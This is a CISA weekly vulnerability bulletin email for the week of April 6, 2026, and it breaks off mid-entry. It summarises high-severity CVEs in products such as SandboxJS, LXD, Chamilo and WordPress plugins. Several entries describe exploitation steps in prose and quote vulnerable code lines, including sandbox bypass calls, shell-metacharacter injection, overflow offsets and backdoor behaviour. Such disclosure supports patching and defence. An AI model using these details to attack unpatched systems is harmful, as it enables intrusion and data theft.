--===============3473165674994229290==
Content-Type: multipart/alternative; boundary="===============2735279975235001205=="
MIME-Version: 1.0

--===============2735279975235001205==
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable

Cybersecurity and Infrastructure Security Agency (CISA)

You are subscribed to Vulnerability Bulletins for Cybersecurity and Infrast= ructure Security Agency. This information has recently been updated and is = now available.

The CISA Vulnerability Bulletin provides a summary of new vulnerabilities t= hat have been recorded in the past week. In some cases, the vulnerabilities=
in the bulletin may not yet have assigned CVSS scores.

Vulnerabilities are based on the=C2=A0Common Vulnerabilities and Exposures =
[ https://www.cve.org/ ]=C2=A0(CVE) vulnerability naming standard and are o= rganized according to severity, determined by the=C2=A0Common Vulnerability=
Scoring System [ https://www.cve.org/about/relatedefforts ]=C2=A0(CVSS) st= andard. The division of high, medium, and low severities correspond to the = following scores:


* *High*: vulnerabilities with a CVSS base score of 7.0=E2=80=9310.0=20
* *Medium*: vulnerabilities with a CVSS base score of 4.0=E2=80=936.9=20
* *Low*: vulnerabilities with a CVSS base score of 0.0=E2=80=933.9=20

Entries may include additional information provided by organizations and ef= forts sponsored by CISA. This information may include identifying informati= on, values, definitions, and related links. Patch information is provided w= hen available. Please note that some of the information in the bulletin is = compiled from external, open-source reports and is not a direct result of C= ISA analysis.

Vulnerability Summary for the Week of April 6, 2026 [ https://www.cisa.gov/= news-events/bulletins/sb26-103 ] 04/14/2026 08:00 AM EDT=20
High Vulnerabilities

Primary
Vendor -- Product Description Published CVSS Score Source Info Patch Info n= yariv--SandboxJS SandboxJS is a JavaScript sandboxing library. Prior to 0.8= .36, SandboxJS blocks direct assignment to global objects (for example Math= .random =3D ...), but this protection can be bypassed through an exposed ca= llable constructor path: this.constructor.call(target, attackerObject). Bec= ause this.constructor resolves to the internal SandboxGlobal function and F= unction.prototype.call is allowed, attacker code can write arbitrary proper= ties into host global objects and persist those mutations across sandbox in= stances in the same process. This vulnerability is fixed in 0.8.36. 2026-04= -06 10 CVE-2026-34208 [ https://www.cve.org/CVERecord?id=3DCVE-2026-34208 ]=
https://github.com/nyariv/SandboxJS/security/advisories/GHSA-2gg9-6p7w-6cpj =C2=A0 Davidtavarez--CF Image Hosting Script CF Image Hosting Script 1.6.5 = allows unauthenticated attackers to download and decode the application dat= abase by accessing the imgdb.db file in the upload/data directory. Attacker=
s can extract delete IDs stored in plaintext from the deserialized database=
and use them to delete all pictures via the d parameter. 2026-04-12 9.8 CV= E-2019-25709 [ https://www.cve.org/CVERecord?id=3DCVE-2019-25709 ] ExploitD= B-46094 [ https://www.exploit-db.com/exploits/46094 ]
Official Product Homepage [ https://davidtavarez.github.io/ ]
Product Reference [ http://forum.codefuture.co.uk/showthread.php?tid=3D7314=
1 ]
VulnCheck Advisory: CF Image Hosting Script 1.6.5 Unauthorized Database Acc= ess [ https://www.vulncheck.com/advisories/cf-image-hosting-script-unauthor= ized-database-access ]
=C2=A0 Beijing Topsec Network Security Technology Co., Ltd.--Tianxin Intern=
et Behavior Management System Tianxin Internet Behavior Management System c= ontains a command injection vulnerability in the Reporter component endpoin=
t that allows unauthenticated attackers to execute arbitrary commands by su= pplying a crafted objClass parameter containing shell metacharacters and ou= tput redirection. Attackers can exploit this vulnerability to write malicio=
us PHP files into the web root and achieve remote code execution with the p= rivileges of the web server process. This vulnerability has been fixed in v= ersion NACFirmware_4.0.0.7_20210716.180815_topsec_0_basic.bin. Exploitation=
evidence was first observed by the Shadowserver Foundation on 2024-06-01 (= UTC). 2026-04-07 9.8 CVE-2021-4473 [ https://www.cve.org/CVERecord?id=3DCVE= -2021-4473 ] https://www.cnvd.org.cn/flaw/show/CNVD-2021-41972 https://www.cnvd.org.cn/patchInfo/show/280166 https://cn-sec.com/archives/4631959.html https://avd.aliyun.com/detail?id=3DAVD-2021-890232 https://www.vulncheck.com/advisories/tianxin-internet-behavior-management-s= ystem-command-injection-via-toquery-php
=C2=A0 Contemporary Controls--BASControl20 An attacker could use data obtai= ned by sniffing the network traffic to forge packets in order to make arbit= rary requests to Contemporary Controls BASC 20T. 2026-04-09 9.8 CVE-2025-13= 926 [ https://www.cve.org/CVERecord?id=3DCVE-2025-13926 ] https://www.ccont= rols.com/support/contacttech.htm https://www.cisa.gov/news-events/ics-advisories/icsa-26-099-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-= 26-099-01.json
=C2=A0 SaturdayDrive--Ninja Forms - File Uploads The Ninja Forms - File Upl= oads plugin for WordPress is vulnerable to arbitrary file uploads due to mi= ssing file type validation in the 'NF_FU_AJAX_Controllers_Uploads::handle_u= pload' function in all versions up to, and including, 3.3.26. This makes it=
possible for unauthenticated attackers to upload arbitrary files on the af= fected site's server which may make remote code execution possible. Note: T=
he vulnerability was partially patched in version 3.3.25 and fully patched =
in version 3.3.27. 2026-04-07 9.8 CVE-2026-0740 [ https://www.cve.org/CVERe= cord?id=3DCVE-2026-0740 ] https://www.wordfence.com/threat-intel/vulnerabil= ities/id/0b606ded-ab50-486a-9337-97ee9f452f12?source=3Dcve https://ninjaforms.com/extensions/file-uploads/
=C2=A0 IBM--Verify Identity Access Container IBM Verify Identity Access Con= tainer 11.0 through 11.0.2 and IBM Security Verify Access Container 10.0 th= rough 10.0.9.1 and IBM Verify Identity Access 11.0 through 11.0.2 and IBM S= ecurity Verify Access 10.0 through 10.0.9.1 could allow a locally authentic= ated user to escalate their privileges to root due to execution with unnece= ssary privileges than required. 2026-04-08 9.3 CVE-2026-1346 [ https://www.= cve.org/CVERecord?id=3DCVE-2026-1346 ] https://www.ibm.com/support/pages/no= de/7268253
=C2=A0 davidfcarr--Quick Playground The Quick Playground plugin for WordPre=
ss is vulnerable to Remote Code Execution in all versions up to, and includ= ing, 1.3.1. This is due to insufficient authorization checks on REST API en= dpoints that expose a sync code and allow arbitrary file uploads. This make=
s it possible for unauthenticated attackers to retrieve the sync code, uplo=
ad PHP files with path traversal, and achieve remote code execution on the = server. 2026-04-09 9.8 CVE-2026-1830 [ https://www.cve.org/CVERecord?id=3DC= VE-2026-1830 ] https://www.wordfence.com/threat-intel/vulnerabilities/id/30= 8cd28a-a477-4bc6-a392-ad5a9eca1cb5?source=3Dcve https://plugins.trac.wordpress.org/browser/quick-playground/trunk/api.php#L=
39
https://plugins.trac.wordpress.org/browser/quick-playground/trunk/expro-api= .php#L419 https://plugins.trac.wordpress.org/changeset?sfp_email=3D&sfph_mail=3D&repo= name=3D&old=3D3500839%40quick-playground&new=3D3500839%40quick-playground&s= fp_email=3D&sfph_mail=3D
=C2=A0 LibRaw--LibRaw A heap-based buffer overflow vulnerability exists in = the x3f_thumb_loader functionality of LibRaw Commit d20315b. A specially cr= afted malicious file can lead to a heap buffer overflow. An attacker can pr= ovide a malicious file to trigger this vulnerability. 2026-04-07 9.8 CVE-20= 26-20889 [ https://www.cve.org/CVERecord?id=3DCVE-2026-20889 ] https://talo= sintelligence.com/vulnerability_reports/TALOS-2026-2358
=C2=A0 LibRaw--LibRaw A heap-based buffer overflow vulnerability exists in = the HuffTable::initval functionality of LibRaw Commit 0b56545 and Commit d2= 0315b. A specially crafted malicious file can lead to a heap buffer overflo=
w. An attacker can provide a malicious file to trigger this vulnerability. = 2026-04-07 9.8 CVE-2026-20911 [ https://www.cve.org/CVERecord?id=3DCVE-2026= -20911 ] https://talosintelligence.com/vulnerability_reports/TALOS-2026-2330 =C2=A0 LibRaw--LibRaw A heap-based buffer overflow vulnerability exists in = the lossless_jpeg_load_raw functionality of LibRaw Commit 0b56545 and Commi=
t d20315b. A specially crafted malicious file can lead to a heap buffer ove= rflow. An attacker can provide a malicious file to trigger this vulnerabili= ty. 2026-04-07 9.8 CVE-2026-21413 [ https://www.cve.org/CVERecord?id=3DCVE-= 2026-21413 ] https://talosintelligence.com/vulnerability_reports/TALOS-2026= -2331
=C2=A0 Weaver Network Co., Ltd.--E-cology Weaver (Fanwei) E-cology 10.0 ver= sions prior to=C2=A020260312 contain an unauthenticated remote code executi=
on vulnerability in the /papi/esearch/data/devops/dubboApi/debug/method end= point that allows attackers to execute arbitrary commands by invoking expos=
ed debug functionality. Attackers can craft POST requests with attacker-con= trolled interfaceName and methodName parameters to reach command-execution = helpers and achieve arbitrary command execution on the system.=C2=A0Exploit= ation evidence was first observed by the Shadowserver Foundation on 2026-03= -31 (UTC). 2026-04-07 9.8 CVE-2026-22679 [ https://www.cve.org/CVERecord?id= =3DCVE-2026-22679 ] https://www.weaver.com.cn/cs/securityDownload.html# https://h4cker.zip/post/d5d211/ https://ti.qianxin.com/vulnerability/notice-detail/1760 https://www.vulncheck.com/advisories/weaver-e-cology-unauthenticated-rce-vi= a-dubboapi-debug-endpoint
=C2=A0 prosolution--ProSolution WP Client The ProSolution WP Client plugin = for WordPress is vulnerable to arbitrary file uploads due to missing file t= ype validation in the 'proSol_fileUploadProcess' function in all versions u=
p to, and including, 1.9.9. This makes it possible for unauthenticated atta= ckers to upload arbitrary files on the affected site's server which may mak=
e remote code execution possible. 2026-04-08 9.8 CVE-2026-2942 [ https://ww= w.cve.org/CVERecord?id=3DCVE-2026-2942 ] https://www.wordfence.com/threat-i= ntel/vulnerabilities/id/3852aef6-42e7-4b71-a1ba-dd41284fd07b?source=3Dcve https://plugins.trac.wordpress.org/browser/prosolution-wp-client/trunk/publ= ic/class-prosolwpclient-public.php?rev=3D3331282#L993 https://plugins.trac.wordpress.org/changeset/3484577/prosolution-wp-client =C2=A0 Rukovoditel--Rukovoditel CRM A reflected cross-site scripting (XSS) = vulnerability exists in Rukovoditel CRM version 3.6.4 and earlier in the Za= darma telephony API endpoint (/api/tel/zadarma.php). The application direct=
ly reflects user-supplied input from the 'zd_echo' GET parameter into the H= TTP response without proper sanitization, output encoding, or content-type = restrictions. The vulnerable code is: if (isset($_GET['zd_echo'])) exit($_G= ET['zd_echo']); An unauthenticated attacker can exploit this issue by craft= ing a malicious URL containing JavaScript payloads. When a victim visits th=
e link, the payload executes in the context of the application within the v= ictim's browser, potentially leading to session hijacking, credential theft=
, phishing, or account takeover. The issue is fixed in version 3.7, which i= ntroduces proper input validation and output encoding to prevent script inj= ection. 2026-04-11 9.3 CVE-2026-31845 [ https://www.cve.org/CVERecord?id=3D= CVE-2026-31845 ] https://forum.rukovoditel.net/viewtopic.php?p=3D22499#p224=
99
=C2=A0 chamilo--chamilo-lms Chamilo LMS is a learning management system. Pr= ior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains an OS Command Injection=
vulnerability in the file move function. The move() function in fileManage= .lib.php passes user-controlled path values directly into exec() shell comm= ands without using escapeshellarg(). When a user moves a document via docum= ent.php, the move_to POST parameter - which only passes through Security::r= emove_XSS() (an HTML-only filter) - is concatenated directly into shell com= mands such as exec("mv $source $target"). By default, Chamilo allows all au= thenticated users to create courses (allow_users_to_create_courses =3D true=
). Any user who is a teacher in a course (including self-created courses) c=
an move documents, making this vulnerability exploitable by any authenticat=
ed user. The attacker must first place a directory with shell metacharacter=
s in its name on the filesystem (achievable via Course Backup Import), then=
move a document into that directory to trigger arbitrary command execution=
as the web server user (www-data). This vulnerability is fixed in 1.11.38 = and 2.0.0-RC.3. 2026-04-10 9.1 CVE-2026-32892 [ https://www.cve.org/CVEReco= rd?id=3DCVE-2026-32892 ] https://github.com/chamilo/chamilo-lms/security/ad= visories/GHSA-59cv-qh65-vvrr https://github.com/chamilo/chamilo-lms/commit/3597b19b73d73d681e4fb503285e9= bbfe71714bf https://github.com/chamilo/chamilo-lms/commit/62671e5e268f235cddfba704edee9= 0f35c234df1
=C2=A0 wpeverest--Everest Forms Contact Form, Payment Form, Quiz, Survey & = Custom Form Builder The Everest Forms plugin for WordPress is vulnerable to=
PHP Object Injection in all versions up to, and including, 3.4.3 via deser= ialization of untrusted input from form entry metadata. This is due to the = html-admin-page-entries-view.php file calling PHP's native unserialize() on=
stored entry meta values without passing the allowed_classes parameter. Th=
is makes it possible for unauthenticated attackers to inject a serialized P=
HP object payload through any public Everest Forms form field. The payload = survives sanitize_text_field() sanitization (serialization control characte=
rs are not stripped) and is stored in the wp_evf_entrymeta database table. = When an administrator views entries or views an individual entry, the unsaf=
e unserialize() call processes the stored data without class restrictions. = 2026-04-08 9.8 CVE-2026-3296 [ https://www.cve.org/CVERecord?id=3DCVE-2026-= 3296 ] https://www.wordfence.com/threat-intel/vulnerabilities/id/2693ae37-7= 90d-4b18-a9ec-054c8c27b8bc?source=3Dcve https://plugins.trac.wordpress.org/browser/everest-forms/tags/3.4.3/include= s/admin/views/html-admin-page-entries-view.php#L133 https://plugins.trac.wordpress.org/browser/everest-forms/trunk/includes/adm= in/views/html-admin-page-entries-view.php#L133 https://plugins.trac.wordpress.org/browser/everest-forms/tags/3.4.3/include= s/evf-core-functions.php#L5594 https://plugins.trac.wordpress.org/changeset/3489938/everest-forms/tags/3.4= .4/readme.txt?old=3D3464753&old_path=3Deverest-forms%2Ftags%2F3.4.3%2Freadm= e.txt https://plugins.trac.wordpress.org/changeset?old_path=3D/everest-forms/tags= /3.4.3&new_path=3D/everest-forms/tags/3.4.4
=C2=A0 chamilo--chamilo-lms Chamilo LMS is a learning management system. Pr= ior to 1.11.38 and 2.0.0-RC.3, the default password reset mechanism generat=
es tokens using sha1($email) with no random component, no expiration, and n=
o rate limiting. An attacker who knows a user's email can compute the reset=
token and change the victim's password without authentication. This vulner= ability is fixed in 1.11.38 and 2.0.0-RC.3. 2026-04-10 9.4 CVE-2026-33707 [=
https://www.cve.org/CVERecord?id=3DCVE-2026-33707 ] https://github.com/cha= milo/chamilo-lms/security/advisories/GHSA-f27g-66gq-g7v2 https://github.com/chamilo/chamilo-lms/commit/078d7e5b77679fa7ccfcd6783bd5c= c683db0bda8 https://github.com/chamilo/chamilo-lms/commit/750a45312a0d5c3ad60dbfbd0d959= ca40be4a18c
=C2=A0 Juniper Networks--JSI LWC A Use of Default Password vulnerability in=
the Juniper Networks Support Insights (JSI) Virtual Lightweight Collector = (vLWC) allows an unauthenticated, network-based attacker to take full contr=
ol of the device. vLWC software images ship with an initial password for a = high privileged account. A change of this password is not enforced during t=
he provisioning of the software, which can make full access to the system b=
y unauthorized actors possible.This issue affects all versions of vLWC befo=
re 3.0.94. 2026-04-09 9.8 CVE-2026-33784 [ https://www.cve.org/CVERecord?id= =3DCVE-2026-33784 ] https://kb.juniper.net/JSA107871
=C2=A0 Canonical--lxd Canonical LXD versions 4.12 through 6.7 contain an in= complete denylist in isVMLowLevelOptionForbidden (lxd/project/limits/permis= sions.go), which omits raw.apparmor and raw.qemu.conf from the set of keys = blocked under the restricted.virtual-machines.lowlevel=3Dblock project rest= riction. A remote attacker with can_edit permission on a VM instance in a r= estricted project can inject an AppArmor rule and a QEMU chardev configurat= ion that bridges the LXD Unix socket into the guest VM, enabling privilege = escalation to LXD cluster administrator and subsequently to host root. 2026= -04-09 9.1 CVE-2026-34177 [ https://www.cve.org/CVERecord?id=3DCVE-2026-341=
77 ] VM lowlevel restriction bypass via raw.apparmor and raw.qemu.conf [ ht= tps://github.com/canonical/lxd/security/advisories/GHSA-fm2x-c5qw-4h6f ]
lxd: Prevent use of raw.apparmor and raw.qemu.conf when low level options a=
re blocked [ https://github.com/canonical/lxd/pull/17909 ]
=C2=A0 Canonical--lxd In Canonical LXD before 6.8, the backup import path v= alidates project restrictions against backup/index.yaml in the supplied tar=
archive but creates the instance from backup/container/backup.yaml, a sepa= rate file in the same archive that is never checked against project restric= tions. An authenticated remote attacker with instance-creation permission i=
n a restricted project can craft a backup archive where backup.yaml carries=
restricted settings such as security.privileged=3Dtrue or raw.lxc directiv= es, bypassing all project restriction enforcement and allowing full host co= mpromise. 2026-04-09 9.1 CVE-2026-34178 [ https://www.cve.org/CVERecord?id= =3DCVE-2026-34178 ] Importing a crafted backup leads to project restriction=
bypass [ https://github.com/canonical/lxd/security/advisories/GHSA-q96j-3f= mm-7fv4 ]
Import: Create backup config from index [ https://github.com/canonical/lxd/= pull/17921 ]
=C2=A0 Canonical--lxd In Canonical LXD versions 4.12 through 6.7, the doCer= tificateUpdate function in lxd/certificates.go does not validate the Type f= ield when handling PUT/PATCH requests to /1.0/certificates/{fingerprint} fo=
r restricted TLS certificate users, allowing a remote authenticated attacke=
r to escalate privileges to cluster admin. 2026-04-09 9.1 CVE-2026-34179 [ = https://www.cve.org/CVERecord?id=3DCVE-2026-34179 ] Update of type field in=
restricted TLS certificate allows privilege escalation to cluster admin [ = https://github.com/canonical/lxd/security/advisories/GHSA-c3h3-89qf-jqm5 ] Improve validation on certificate edit [ https://github.com/canonical/lxd/p= ull/17936 ]
=C2=A0 Nextendweb--Smart Slider 3 Pro for WordPress Smart Slider 3 Pro vers= ion 3.5.1.35 for WordPress and Joomla contains a multi-stage remote access = toolkit injected through a compromised update system that allows unauthenti= cated attackers to execute arbitrary code and commands. Attackers can trigg=
er pre-authentication remote shell execution via HTTP headers, establish au= thenticated backdoors accepting arbitrary PHP code or OS commands, create h= idden administrator accounts, exfiltrate credentials and access keys, and m= aintain persistence through multiple injection points including must-use pl= ugins and core file modifications. 2026-04-09 9.8 CVE-2026-34424 [ https://= www.cve.org/CVERecord?id=3DCVE-2026-34424 ] https://smartslider.helpscoutdo= cs.com/article/2144-wordpress-security-advisory-smart-slider-3-pro-3-5-1-35= -compromise https://smartslider.helpscoutdocs.com/article/2143-joomla-security-advisory= -smart-slider-3-pro-3-5-1-35-compromise https://patchstack.com/database/wordpress/plugin/nextend-smart-slider3-pro/= vulnerability/wordpress-smart-slider-3-plugin-3-5-1-35-backdoor-vulnerabili=
ty
https://patchstack.com/articles/critical-supply-chain-compromise-in-smart-s= lider-3-pro-full-malware-analysis/ https://mysites.guru/blog/smart-slider-3-pro-supply-chain-compromise/
=C2=A0 usebruno--bruno Bruno is an open source IDE for exploring and testin=
g APIs. Prior to 3.2.1, Bruno was affected by a supply chain attack involvi=
ng compromised versions of the axios npm package, which introduced a hidden=
dependency deploying a cross-platform Remote Access Trojan (RAT). Users of=
@usebruno/cli who ran npm install between 00:21 UTC and ~03:30 UTC on Marc=
h 31, 2026 may have been impacted. Upgrade to 3.2.1 2026-04-06 9.8 CVE-2026= -34841 [ https://www.cve.org/CVERecord?id=3DCVE-2026-34841 ] https://github= .com/usebruno/bruno/security/advisories/GHSA-658g-p7jg-wx5g https://github.com/axios/axios/issues/10604 https://github.com/usebruno/bruno/pull/7632 https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat =C2=A0 R-Project--RGui RGui 3.5.0 contains a local buffer overflow vulnerab= ility in the GUI preferences dialog that allows attackers to bypass DEP pro= tections through structured exception handling exploitation. Attackers can = craft malicious input in the Language for menus and messages field to trigg=
er a stack-based buffer overflow, execute a ROP chain for VirtualAlloc allo= cation, and achieve arbitrary code execution. 2026-04-12 8.4 CVE-2018-25258=
[ https://www.cve.org/CVERecord?id=3DCVE-2018-25258 ] ExploitDB-46107 [ ht= tps://www.exploit-db.com/exploits/46107 ]
Official Product Homepage [ https://www.r-project.org/ ]
Product Reference [ https://cran.r-project.org/bin/windows/base/old/3.5.0/R= -3.5.0-win.exe ]
VulnCheck Advisory: RGui 3.5.0 Local Buffer Overflow SEH DEP Bypass [ https= ://www.vulncheck.com/advisories/rgui-local-buffer-overflow-seh-dep-bypass ] =C2=A0 Html5Videoplayer--HTML5 Video Player HTML5 Video Player 1.2.5 contai=
ns a local buffer overflow vulnerability that allows attackers to execute a= rbitrary code by supplying an oversized key code string. Attackers can craf=
t a malicious payload exceeding 997 bytes and paste it into the KEY CODE fi= eld in the Help Register dialog to trigger code execution and spawn a calcu= lator process. 2026-04-12 8.4 CVE-2019-25689 [ https://www.cve.org/CVERecor= d?id=3DCVE-2019-25689 ] ExploitDB-46279 [ https://www.exploit-db.com/exploi= ts/46279 ]
Official Product Homepage [ http://www.html5videoplayer.net/download.html ] VulnCheck Advisory: HTML5 Video Player 1.2.5 Local Buffer Overflow Non-SEH =
[ https://www.vulncheck.com/advisories/html5-video-player-local-buffer-over= flow-non-seh ]
=C2=A0 Faleemi--Faleemi Desktop Software Faleemi Desktop Software 1.8 conta= ins a local buffer overflow vulnerability in the System Setup dialog that a= llows attackers to bypass DEP protections through structured exception hand= ling exploitation. Attackers can inject a crafted payload into the Save Pat=
h for Snapshot and Record file field to trigger a buffer overflow and execu=
te arbitrary code via ROP chain gadgets. 2026-04-12 8.4 CVE-2019-25691 [ ht= tps://www.cve.org/CVERecord?id=3DCVE-2019-25691 ] ExploitDB-46269 [ https:/= /www.exploit-db.com/exploits/46269 ]
Official Product Homepage [ https://www.faleemi.com/ ]
VulnCheck Advisory: Faleemi Desktop Software 1.8 Local Buffer Overflow SEH = DEP Bypass [ https://www.vulncheck.com/advisories/faleemi-desktop-software-= local-buffer-overflow-seh-dep-bypass ]
=C2=A0 r-project--R R 3.4.4 contains a local buffer overflow vulnerability = that allows attackers to execute arbitrary code by injecting malicious inpu=
t into the GUI Preferences language field. Attackers can craft a payload wi=
th a 292-byte offset and JMP ESP instruction to execute commands like calc.= exe when the payload is pasted into the Language for menus and messages fie= ld. 2026-04-12 8.4 CVE-2019-25695 [ https://www.cve.org/CVERecord?id=3DCVE-= 2019-25695 ] ExploitDB-46265 [ https://www.exploit-db.com/exploits/46265 ] Official Product Homepage [ https://cloud.r-project.org/bin/windows/ ] VulnCheck Advisory: R 3.4.4 Local Buffer Overflow Windows XP SP3 [ https://= www.vulncheck.com/advisories/r-local-buffer-overflow-windows-xp-sp3 ]
=C2=A0 VictorAlagwu--CMSsite CMSsite 1.0 contains an SQL injection vulnerab= ility that allows unauthenticated attackers to manipulate database queries =
by injecting SQL code through the cat_id parameter. Attackers can send GET = requests to category.php with malicious cat_id values to extract sensitive = database information including usernames and credentials. 2026-04-12 8.2 CV= E-2019-25697 [ https://www.cve.org/CVERecord?id=3DCVE-2019-25697 ] ExploitD= B-46259 [ https://www.exploit-db.com/exploits/46259 ]
Product Reference [ https://github.com/VictorAlagwu/CMSsite/archive/master.= zip ]
VulnCheck Advisory: CMSsite 1.0 SQL Injection via category.php [ https://ww= w.vulncheck.com/advisories/cmssite-sql-injection-via-category-php ]
=C2=A0 Divxtodvd--Easy Video to iPod Converter Easy Video to iPod Converter=
1.6.20 contains a local buffer overflow vulnerability in the user registra= tion field that allows local attackers to overwrite the structured exceptio=
n handler. Attackers can input a crafted payload exceeding 996 bytes in the=
username field to trigger SEH overwrite and execute arbitrary code with us=
er privileges. 2026-04-12 8.4 CVE-2019-25701 [ https://www.cve.org/CVERecor= d?id=3DCVE-2019-25701 ] ExploitDB-46255 [ https://www.exploit-db.com/exploi= ts/46255 ]
Official Product Homepage [ http://www.divxtodvd.net/ ]
Product Reference [ http://www.divxtodvd.net/easy_video_to_ipod.exe ]
VulnCheck Advisory: Easy Video to iPod Converter 1.6.20 Local Buffer Overfl=
ow SEH [ https://www.vulncheck.com/advisories/easy-video-to-ipod-converter-= local-buffer-overflow-seh ]
=C2=A0 Sourceforge--Echo Mirage Echo Mirage 3.1 contains a stack buffer ove= rflow vulnerability that allows local attackers to crash the application or=
execute arbitrary code by supplying an oversized string in the Rules actio=
n field. Attackers can create a malicious text file with a crafted payload = exceeding buffer boundaries and paste it into the action field through the = Rules dialog to trigger the overflow and overwrite the return address. 2026= -04-12 8.4 CVE-2019-25705 [ https://www.cve.org/CVERecord?id=3DCVE-2019-257=
05 ] ExploitDB-46216 [ https://www.exploit-db.com/exploits/46216 ]
Official Product Homepage [ http://initd.sh/ ]
Product Reference [ https://sourceforge.net/projects/echomirage.oldbutgold.=
p/ ]
VulnCheck Advisory: Echo Mirage 3.1 Stack Buffer Overflow via Rules Action = Field [ https://www.vulncheck.com/advisories/echo-mirage-stack-buffer-overf= low-via-rules-action-field ]
=C2=A0 Dolibarr--Dolibarr ERP-CRM Dolibarr ERP-CRM 8.0.4 contains an SQL in= jection vulnerability in the rowid parameter of the admin dict.php endpoint=
that allows attackers to execute arbitrary SQL queries. Attackers can inje=
ct malicious SQL code through the rowid POST parameter to extract sensitive=
database information using error-based SQL injection techniques. 2026-04-1=
2 8.2 CVE-2019-25710 [ https://www.cve.org/CVERecord?id=3DCVE-2019-25710 ] = ExploitDB-46095 [ https://www.exploit-db.com/exploits/46095 ]
Official Product Homepage [ https://www.dolibarr.org/ ]
Product Reference [ https://sourceforge.net/projects/dolibarr/files/Dolibar= r%20ERP-CRM/8.0.4/dolibarr-8.0.4.zip ]
VulnCheck Advisory: Dolibarr ERP-CRM 8.0.4 SQL Injection via rowid Paramete=
r [ https://www.vulncheck.com/advisories/dolibarr-erp-crm-sql-injection-via= -rowid-parameter ]
=C2=A0 Synology--Synology SSL VPN Client A plaintext storage of a password = vulnerability in Synology SSL VPN Client before 1.4.5-0684 allows remote at= tackers to access or influence the user's PIN code due to insecure storage.=
This may lead to unauthorized VPN configuration and potential interception=
of subsequent VPN traffic when combined with user interaction. 2026-04-10 = 8.1 CVE-2021-47961 [ https://www.cve.org/CVERecord?id=3DCVE-2021-47961 ] Sy= nology-SA-26:05 Synology SSL VPN Client [ https://www.synology.com/en-globa= l/security/advisory/Synology_SA_26_05 ]
=C2=A0 Adivaha--WordPress adivaha Travel Plugin WordPress adivaha Travel Pl= ugin 2.3 contains a time-based blind SQL injection vulnerability that allow=
s unauthenticated attackers to manipulate database queries by injecting SQL=
code through the 'pid' GET parameter. Attackers can send requests to the /= mobile-app/v3/ endpoint with crafted 'pid' values using XOR-based payloads =
to extract sensitive database information or cause denial of service. 2026-= 04-09 8.2 CVE-2023-54359 [ https://www.cve.org/CVERecord?id=3DCVE-2023-5435=
9 ] ExploitDB-51655 [ https://www.exploit-db.com/exploits/51655 ]
Official Product Homepage [ https://www.adivaha.com/ ]
Product Reference [ https://wordpress.org/plugins/adiaha-hotel/ ]
VulnCheck Advisory: WordPress adivaha Travel Plugin 2.3 SQL Injection via p=
id [ https://www.vulncheck.com/advisories/wordpress-adivaha-travel-plugin-s= ql-injection-via-pid ]
=C2=A0 Juniper Networks--Apstra A Key Exchange without Entity Authenticatio=
n vulnerability in the SSH implementation of Juniper Networks Apstra allows=
a unauthenticated, MITM attacker to impersonate managed devices. Due to in= sufficient SSH host key validation an attacker can perform a machine-in-the= -middle attack on the SSH connections from Apstra to managed devices, enabl= ing an attacker to impersonate a managed device and capture user credential=
s. This issue affects all versions of=C2=A0Apstra before 6.1.1. 2026-04-09 = 8.7 CVE-2025-13914 [ https://www.cve.org/CVERecord?id=3DCVE-2025-13914 ] ht= tps://kb.juniper.net/JSA107862
=C2=A0 Qualcomm, Inc.--Snapdragon Memory corruption when decoding corrupted=
satellite data files with invalid signature offsets. 2026-04-06 8.8 CVE-20= 25-47392 [ https://www.cve.org/CVERecord?id=3DCVE-2025-47392 ] https://docs= .qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.= html
=C2=A0 CactusThemes--VideoPro Improper Control of Filename for Include/Requ= ire Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in=
CactusThemes VideoPro allows PHP Local File Inclusion.This issue affects V= ideoPro: from n/a through 2.3.8.1. 2026-04-10 8.1 CVE-2025-58913 [ https://= www.cve.org/CVERecord?id=3DCVE-2025-58913 ] https://patchstack.com/database= /wordpress/theme/videopro/vulnerability/wordpress-videopro-theme-2-3-8-1-lo= cal-file-inclusion-vulnerability?_s_id=3Dcve
=C2=A0 Hitachi--JP1/IT Desktop Management 2 - Manager Remote Code Execution=
Vulnerability=C2=A0in JP1/IT Desktop Management 2 - Manager on Windows, JP= 1/IT Desktop Management 2 - Operations Director on Windows, Job Management = Partner 1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Mana= gement - Manager on Windows, Job Management Partner 1/IT Desktop Management=
- Manager on Windows, JP1/NETM/DM Manager on Windows, JP1/NETM/DM Client o=
n Windows, Job Management Partner 1/Software Distribution Manager on Window=
s, Job Management Partner 1/Software Distribution Client on Windows.This is= sue affects JP1/IT Desktop Management 2 - Manager: from 13-50 before 13-50-= 02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 befo=
re 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 1= 0-50 through 12-50-11; JP1/IT Desktop Management 2 - Operations Director: f= rom 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13= -10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 = before 12-60-12, from 10-50 through 12-50-11; Job Management Partner 1/IT D= esktop Management 2 - Manager: from 10-50 through 10-50-11; JP1/IT Desktop = Management - Manager: from 09-50 through 10-10-16; Job Management Partner 1= /IT Desktop Management - Manager: from 09-50 through 10-10-16; JP1/NETM/DM = Manager: from 09-00 through 10-20-02; JP1/NETM/DM Client: from 09-00 throug=
h 10-20-02; Job Management Partner 1/Software Distribution Manager: from 09= -00 through 09-51-13; Job Management Partner 1/Software Distribution Client=
: from 09-00 through 09-51-13. 2026-04-07 8.8 CVE-2025-65115 [ https://www.= cve.org/CVERecord?id=3DCVE-2025-65115 ] https://www.hitachi.com/products/it= /software/security/info/vuls/hitachi-sec-2026-118/index.html
=C2=A0 IBM--Verify Identity Access Container IBM Verify Identity Access Con= tainer 11.0 through 11.0.2 and IBM Security Verify Access Container 10.0 th= rough 10.0.9.1 and IBM Verify Identity Access 11.0 through 11.0.2 and IBM S= ecurity Verify Access 10.0 through 10.0.9.1 could allow a locally authentic= ated user to execute malicious scripts from outside of its control sphere. = 2026-04-07 8.5 CVE-2026-1342 [ https://www.cve.org/CVERecord?id=3DCVE-2026-= 1342 ] https://www.ibm.com/support/pages/node/7268253
=C2=A0 LibRaw--LibRaw An integer overflow vulnerability exists in the defla= te_dng_load_raw functionality of LibRaw Commit 8dc68e2. A specially crafted=
